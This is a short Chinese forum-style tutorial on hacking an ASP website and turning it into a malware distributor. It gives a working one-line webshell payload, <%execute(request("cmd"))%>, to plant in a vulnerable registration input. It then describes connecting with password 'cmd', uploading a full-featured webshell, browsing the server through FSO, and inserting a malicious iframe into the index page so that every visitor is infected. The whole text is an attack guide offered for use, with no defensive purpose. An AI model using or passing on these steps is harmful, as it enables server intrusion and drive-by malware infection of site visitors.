挂马使用一句话木马:
http://bbs.mmbest.com/viewthread ... =%D2%BB%BE%E4%BB%B0

选择目标网站，将一句话木马放到有漏洞的地方，比如哪个注册的地方，在随意哪个输入框加上一句话木马<%execute(request("cmd"))%>
然后打开你下载的那个HTML文件，地址就打上那个ASP文件的地址，比如注册时的那个ASP文件。
然后打密码CMD。
连上，上传大马，大马一般的话都是用海洋，或者是桂林老兵的“站长助手”。
然后连上大马。如果支持FSO的话，就可以浏览那个空间了。界面吧，大概和WIN3.2差不多了，哈哈。文件夹都是怪怪的。如果权限足够大的话。你也许可以浏览全部服务器了。如果设置BT的主机的话，你也许只能看那个空间了。不过一样足够了。就等于你FTP上去了一样，随便控制了。挂马还是什么的。

挂马就是编辑首面文件了，一般是INDEX。HTML或是HTM。把IFRM那句插进去，以后只要有人浏览首页就中奖，当然中奖率要看你的网马强度。